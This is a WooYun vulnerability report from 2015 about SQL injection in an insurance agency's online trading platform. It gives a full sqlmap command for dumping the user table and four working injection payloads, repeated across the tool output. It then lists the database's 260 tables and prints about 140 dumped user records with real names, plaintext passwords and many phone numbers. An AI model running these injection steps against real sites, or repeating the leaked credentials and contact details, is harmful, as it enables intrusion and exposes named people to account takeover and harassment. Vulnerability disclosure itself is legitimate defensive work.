当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152450

漏洞标题:北京立康保险代理有限公司某在线交易保险平台存在SQL注射漏洞(260个表/大量用户的真实姓名,明文密码,邮箱地址及电话号码泄露)

相关厂商:北京立康保险代理有限公司

漏洞作者: 路人甲

提交时间:2015-11-07 09:45

修复时间:2015-12-26 10:32

公开时间:2015-12-26 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

每个人一生中都不可缺少保险保障,保险涵盖了保障及避险的双重意义,近年来由于保险的多元化发展,更具备了投资理财的功能。立刻保隶属于北京立康保险代理有限公司,是中国领先的在线交易保险平台, 致力于将保险商品与线上功能的完美融合,为广大用户提供更为便捷的服务。立刻保在全国各地均设有服务中心,并与当地保险公司保持着密切、良好的合作,代理十几家保险公司的保险产品,我们希望能够通过互联网的特性把保险商品信息透明化,让客户能够足不出户、轻松、自由、不受打扰的环境里完成产品比较和选择、付款等投保行为。

详细说明:

地址:http://**.**.**.**/companycategory/?Command=Index&company_category_no=141

python sqlmap.py -u "http://**.**.**.**/companycategory/?Command=Index&company_category_no=141" --random-agent -p company_category_no --technique=BETU --batch -D LIKE18 -T user -C user_id,user_name,user_pw,user_email,user_phone,user_mobile --dump --threads=10

漏洞证明:

<code>---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
current user: 'like18@%'
current user is DBA: False
database management system users [1]:
[*] 'like18'@'%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
current user: 'like18@%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] LIKE18
[*] LIKE18S
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
Database: LIKE18
[260 tables]
+--------------------------------------+
| character |
| order |
| user |
| account |
| account_detail |
| account_maintenance |
| account_trade_logs |
| accounting_receivable |
| actually_receive |
| advertising_category |
| advertising_detail |
| advertising_detail_logs |
| agency_agreement |
| agent |
| archivements_report |
| auto_policy_logs |
| b2b_air_batch |
| b2b_air_detail |
| b2b_car_info |
| backup_auto_policy_logs |
| backup_order |
| backup_order_commission_batch |
| backup_order_commission_receivable |
| backup_order_commission_receive |
| backup_order_customer |
| backup_order_detail |
| backup_order_final_payment |
| backup_order_final_transfer |
| backup_order_last_status |
| backup_order_payment_batch |
| backup_order_payment_receivable |
| backup_order_payment_receive |
| backup_order_product_batch |
| backup_order_should_transfer |
| backup_order_status_logs |
| backup_order_suspense_credits |
| backup_order_transfer_batch |
| bonus |
| bonus_type |
| cache_advertising_costs_statistics |
| cache_insurance_day_statistics |
| cache_insurance_month_statistics |
| cache_insurance_week_statistics |
| cache_operating_trends_statistics |
| cache_ping_trip_insurance_statistics |
| cache_traffic_trends_statistics |
| cache_vehicle_insurance_statistics |
| car_discount |
| car_discount_property |
| car_info |
| car_info_bj |
| car_info_hz |
| card_result |
| category |
| character_number |
| city |
| cm_product |
| cm_product_property |
| cm_product_property_detail |
| cm_product_property_top |
| cm_product_type |
| company |
| company_category |
| counter_log |
| coupons |
| coupons_events |
| coupons_number |
| cpk_category |
| cpk_policy |
| cpk_product |
| cpk_product_category_tags |
| cpk_product_price_property |
| cpk_product_property |
| cpk_property |
| cpk_tags |
| domain2ip |
| easybuy |
| emails_lib |
| emails_logs |
| emails_transmit_lib |
| emails_transmit_stat |
| fastins_info |
| feedback |
| feedback_call |
| feedback_order |
| feedback_order_detail |
| feedback_order_spec_life |
| feedback_phone |
| feedback_statistics |
| freight_rate |
| groups |
| groups_rights |
| insurance_category |
| insurance_detail |
| insurance_documents |
| insurance_policy_send |
| insured_member |
| job_category |
| job_category_company |
| line_commission |
| logs |
| mail_rebuy |
| mail_rebuy_detail |
| member |
| member_account |
| member_account_month_data |
| member_apply_cash |
| member_bank_info |
| member_commission |
| member_group |
| member_to_user |
| order_commission_batch |
| order_commission_receivable |
| order_commission_receive |
| order_customer |
| order_detail |
| order_final_payment |
| order_final_transfer |
| order_insurance_documents |
| order_last_status |
| order_long_commission |
| order_payment_batch |
| order_payment_excessive |
| order_payment_platform |
| order_payment_platform_detail |
| order_payment_receivable |
| order_payment_receive |
| order_product_batch |
| order_refundment |
| order_reinsure |
| order_reinsure_status |
| order_should_transfer |
| order_spec_accident |
| order_spec_bike |
| order_spec_carbody |
| order_spec_corpaccident |
| order_spec_corphome |
| order_spec_corporation |
| order_spec_duty |
| order_spec_freight |
| order_spec_house |
| order_spec_moto |
| order_spec_traffic |
| order_spec_travel |
| order_status |
| order_status_degrees |
| order_status_logs |
| order_status_property |
| order_suspense_credits |
| order_suspense_credits_prepaid |
| order_temporary_fee |
| order_transfer_batch |
| page |
| page_body |
| page_body_history |
| page_code |
| partners |
| permit_ips |
| personnel |
| phone |
| phone_logs |
| pingan_elasticity_tmp |
| piwik_report |
| policy_confirm_info |
| product |
| product_commission |
| product_commission_assign |
| product_commission_doc |
| product_price |
| product_property |
| product_set |
| promotions |
| pt_cash_apply |
| pt_content |
| pt_order_detail |
| recom_content |
| recom_convert_log |
| recom_pay_log |
| recom_product |
| recom_product_log |
| recommend |
| region |
| resourcesallocation |
| resourcesallocation_logs |
| safe_track |
| sales_group |
| sales_user_account |
| sales_user_bonus_apply |
| sales_user_bonus_detail |
| sales_user_bonus_detail_prev |
| sales_user_bonus_property |
| sales_user_group |
| sales_user_product_bonus |
| search_keyword |
| service_order |
| service_order_customer |
| service_order_detail |
| service_order_feedback |
| service_order_last_status |
| service_order_quote_company |
| service_order_quote_price |
| service_order_spec_carbody |
| service_order_status |
| service_order_status_detail_logs |
| service_order_status_logs |
| service_order_status_property |
| shop |
| shop_series |
| shop_series_product |
| site_config |
| staffing |
| syslogs |
| tmp_commission |
| user_group_set |
| user_groups |
| user_groups_logs |
| user_profile |
| user_recommand_type |
| view_allocations |
| view_categorytree |
| view_commission |
| view_commission_tmp |
| view_flow_admin |
| view_flow_commission |
| view_flow_doc |
| view_flow_fee |
| view_flow_finish |
| view_flow_payment |
| view_flow_refundment |
| view_flow_service |
| view_flow_transfer |
| view_groups_page |
| view_member_commission |
| view_order |
| view_order_detail |
| view_order_normal |
| view_page_search |
| view_payment_fare |
| view_phone_select |
| view_refundment |
| view_service_order |
| view_service_status_logs |
| view_status_logs |
| view_status_property |
| view_suspense_credits |
| view_transfer |
| view_user_groups |
| view_user_page_code |
| view_user_sales_group |
| web_account |
| web_account_detail |
| workgroup |
| workgrouptypes |
| yingshou_allocate_source |
| yingshou_discount |
| yingshou_distribution |
| yingshou_revenue_category |
| yingshou_revenue_category_details |
| zj_fate |
| zj_fate_detail |
+--------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
Database: LIKE18
Table: user
[32 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| allow_ip | varchar(100) |
| areaid | mediumint(8) |
| create_time | datetime |
| create_user_no | int(11) unsigned |
| del_flag | tinyint(4) |
| note | text |
| old_user_pw1 | varchar(20) |
| old_user_pw2 | varchar(20) |
| old_user_pw3 | varchar(20) |
| pw_error_count | tinyint(3) |
| pw_last_update | datetime |
| update_time | datetime |
| update_user_no | int(11) unsigned |
| user_allocateweight | int(11) |
| user_bindable | tinyint(3) |
| user_bindto | int(10) |
| user_business_type | tinyint(3) |
| user_dep | varchar(100) |
| user_email | varchar(100) |
| user_feedbackweight | tinyint(3) |
| user_id | varchar(20) |
| user_last_login | datetime |
| user_mobile | varchar(20) |
| user_name | varchar(100) |
| user_no | int(10) |
| user_orderweight | int(11) |
| user_phone | varchar(20) |
| user_pw | varchar(20) |
| user_status | tinyint(3) |
| user_title | varchar(100) |
| user_type | tinyint(3) |
| user_workgroupid | int(11) |
+---------------------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULLsqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
Database: LIKE18
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 703 |
+--------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
Database: LIKE18
Table: user
[703 entries]
+----------------------+-----------------------+----------------------+------------------------------+------------------+--------------+
| user_id | user_name | user_pw | user_email | user_phone | user_mobile |
+----------------------+-----------------------+----------------------+------------------------------+------------------+--------------+
| able.luo | 骆晓娟 | xiao397214612 | able.luo@**.**.**.** | 86706260 | 15989373014 |
| ailin.ren | 任倩 | 111111 | <blank> | <blank> | <blank> |
| Aimee.ming | 明芳宇 | 111111 | <blank> | <blank> | <blank> |
| albert.wang | albert.wang | 030303 | <blank> | <blank> | <blank> |
| alexjia | Camel Hu | 760509 | camel.hu@**.**.**.** | 15311873953 | 13701338775 |
| allen | 王蒙 | 111111 | allen.wang@**.**.**.** | <blank> | <blank> |
| ann.li | 李春玲 | 000327 | <blank> | <blank> | <blank> |
| anna.yang | 杨洋 | 890924 | <blank> | <blank> | <blank> |
| apple.mei | 梅瑜沨 | meizi555 | apple.mei@**.**.**.** | <blank> | <blank> |
| Arilvi.Deng.010 | Arilvi.Deng.010 | 111111 | <blank> | <blank> | <blank> |
| Arilvi.Deng.020 | Ailvi.Deng.020 | 111111 | <blank> | <blank> | <blank> |
| Arilvi.Deng.021 | Arilvi.Deng.021 | 111111 | arilvi.Deng@**.**.**.** | 62094065-813 | 18930699646 |
| azcn | 客户01 | 111111 | <blank> | <blank> | <blank> |
| azcn01 | 锦鸿会展 | 888888 | <blank> | <blank> | <blank> |
| azcn02 | 来孙晔 | 111111 | <blank> | <blank> | 13777411125 |
| azcn03 | 欧陆通旅行社 董铁冰 | 111111 | <blank> | <blank> | 13651875122 |
| azcn04 | 章小英 | zxy780801 | <blank> | <blank> | <blank> |
| azcn05 | 上海瑞签商务咨询 | rq312692 | 1669663757@**.**.**.** | 62258539 | 18017620265 |
| bj001 | 北京行政组长 | 111111 | <blank> | <blank> | <blank> |
| bonus_001 | 大区奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_002 | 华东奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_003 | 华北奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_004 | 华南奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_005 | 上海奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_006 | 上海客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_007 | 上海行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_008 | 北京奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_009 | 北京客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_010 | 北京行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_011 | 广州奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_012 | 广州客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_013 | 广州行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_014 | 南京奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_015 | 南京客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_016 | 南京行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_017 | 杭州奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_018 | 杭州客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_019 | 杭州行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_020 | 无锡奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_021 | 无锡客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_022 | 无锡行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_023 | 盱眙奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_024 | 盱眙客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_025 | 盱眙行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_026 | 丹阳奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_027 | 丹阳客服组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bonus_028 | 丹阳行政组奖金管理帐号 | 111111 | <blank> | <blank> | <blank> |
| bruce.zhang | 张奎 | like18123 | <blank> | <blank> | <blank> |
| bruce.zhang.021 | 张奎(培训) | 111111 | <blank> | <blank> | <blank> |
| bruce.zhang1 | 张奎 | zk344833 | <blank> | <blank> | 1327173184 |
| candy.wang | 王菲 | 0000 | <blank> | <blank> | <blank> |
| ceshi | 熊琰测试 | ceshi123456 | <blank> | <blank> | <blank> |
| chengze | 陈则先 | 123456 | <blank> | <blank> | <blank> |
| cherry.zhao.010 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.020 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.021 | 赵烨 | 19751016 | <blank> | <blank> | <blank> |
| cherry.zhao.024 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.027 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.028 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.0451 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.0571 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.0579 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.0755 | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| cherry.zhao.hq | 赵烨 | 111111 | <blank> | <blank> | <blank> |
| chexianwuyou | 车险无忧合作公司 | pars2010 | <blank> | 83279211 | 13505182987 |
| Cindy.Wang.010 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.020 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.021 | 汪胜容 | 111111 | <blank> | <blank> | 15900565375 |
| Cindy.Wang.024 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.027 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.028 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.0451 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.0571 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.0579 | 汪胜容 | 1111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.0755 | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| Cindy.Wang.hq | 汪胜容 | 111111 | <blank> | <blank> | <blank> |
| ck | 陈抗 | 666666 | <blank> | <blank> | <blank> |
| ck2000 | 陈抗 | 666666 | <blank> | <blank> | <blank> |
| ck2001 | 陈抗 | 666666 | <blank> | <blank> | <blank> |
| ck2002 | 陈抗 | 666666 | <blank> | <blank> | <blank> |
| coco.yang | 杨怡珂 | 000000 | coco.yang@**.**.**.** | 62269857-701 | <blank> |
| cray.che | 车凯 | 002171 | che.kai@**.**.**.** | <blank> | 13989897234 |
| daniel | daniel | chioud6 | <blank> | <blank> | <blank> |
| dingfeng | 鼎沣保代 | 111111 | <blank> | <blank> | <blank> |
| dongyanbjrb1 | 冬炎网络北京(人保人寿深圳单次)合作公司 | like18 | <blank> | <blank> | <blank> |
| dongyanbjrb10 | 冬炎网络北京(人保人寿深圳10天)合作公司 | dy2013168 | <blank> | <blank> | <blank> |
| dongyanbjrb7 | 冬炎网络北京(人保人寿深圳7天)合作公司 | 111111 | <blank> | <blank> | <blank> |
| dongyanshtrafficrb | 冬炎网络上海(人保人寿交通工具意外) | dy123 | <blank> | <blank> | <blank> |
| dongyanxh | 冬炎网络(新华)合作公司 | 111111 | <blank> | <blank> | <blank> |
| dylan.zhang | 张磊 | 000610049 | dylan.zhang@**.**.**.** | <blank> | <blank> |
| dywl | 冬炎网络(平安养老)合作公司 | 111111 | <blank> | <blank> | <blank> |
| Ella.Cen.010 | 岑银平 | 111111 | <blank> | <blank> | <blank> |
| Ella.Cen.020 | 岑银平 | 111111 | <blank> | <blank> | <blank> |
| Ella.Cen.021 | 岑银平 | 222222 | <blank> | <blank> | <blank> |
| Ella.Cen.0571 | 岑银平 | 111111 | <blank> | <blank> | <blank> |
| emily.ni | 倪虹 | 101010 | <blank> | <blank> | <blank> |
| emily.wang.010 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.020 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.021 | 王琛琛 | xiaochen | <blank> | <blank> | <blank> |
| emily.wang.024 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.027 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.028 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.0451 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.0571 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.0579 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.0755 | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| emily.wang.hq | 王琛琛 | 111111 | <blank> | <blank> | <blank> |
| Emily.Wen | 温贝贝 | 1026 | <blank> | 01082101143-368 | 18618459732 |
| even | even | 58817757 | <blank> | <blank> | <blank> |
| fenglihua | 冯丽花 | likang06 | fenglihua@**.**.**.** | <blank> | 13580302401 |
| fiona.jiang | 蒋雨杉 | 111111 | fiona.jiang@**.**.**.** | <blank> | <blank> |
| freeman.yao | 姚桦 | yao999 | <blank> | <blank> | <blank> |
| happy.he | 何敏妍 | 111111 | happy.he@**.**.**.** | 020-62795646 | <blank> |
| happy.he.663 | happy | 111111 | <blank> | <blank> | <blank> |
| helen.chai | helen.chai | 111111 | <blank> | <blank> | <blank> |
| hjjr | 北京黄金假日旅行社有限公司 | 111111 | <blank> | <blank> | <blank> |
| hnguowang | hnguowang | ok0707 | <blank> | <blank> | <blank> |
| hnguowang01 | hnguowang01 | 111111 | hnwlw99@**.**.**.** | 15103666111 | <blank> |
| hnguowang02 | hnguowang02 | 111111 | <blank> | 13138957777 | <blank> |
| hnguowang03 | hnguowang03 | 111111 | <blank> | <blank> | <blank> |
| hnguowang04 | hnguowang04 | 111111 | <blank> | <blank> | <blank> |
| hnguowang05 | hnguowang05 | 222222 | hnwlw99@**.**.**.** | 15103666333 | 13330970577 |
| hnguowang06 | hnguowang06 | hn22018278 | <blank> | 15103666111 | <blank> |
| hnguowang07 | hnguowang07 | 111111 | <blank> | <blank> | <blank> |
| hnguowang08 | hnguowang08 | 111111 | <blank> | <blank> | <blank> |
| hnguowang09 | hnguowang09 | 111111 | <blank> | <blank> | <blank> |
| hnguowang10 | hnguowang10 | 111111 | <blank> | <blank> | <blank> |
| honga | honga | honga0525 | <blank> | <blank> | <blank> |
| hongdingrb | 弘鼎世创(人保人寿单次)合作公司 | 111111 | <blank> | <blank> | <blank> |
| hongdingrb7 | 弘鼎世创(人保人寿7天)合作公司 | 111111 | <blank> | <blank> | <blank> |
| hongdingtp | 弘鼎世创(天平单次)合作公司 | 111111 | <blank> | <blank> | <blank> |
| hongdingtp7 | 弘鼎世创(天平7天)合作公司 | 111111 | <blank> | <blank> | <blank> |
| honghengbjrb1 | 成都鸿亨北京(人保人寿深圳单次)合作公司 | 111111 | <blank> | <blank> | <blank> |
| honghengbjrb10 | 成都鸿亨北京(人保人寿深圳10日)合作公司 | 111111 | <blank> | <blank> | <blank> |
| honghengbjrb7 | 成都鸿亨北京(人保人寿深圳7日)合作公司 | 111111 | <blank> | <blank> | <blank> |
| huangzhen | 黄真 | 123456 | <blank> | <blank> | <blank> |
| hxhospital | 禾新医院 | 123456 | <blank> | <blank> | <blank> |
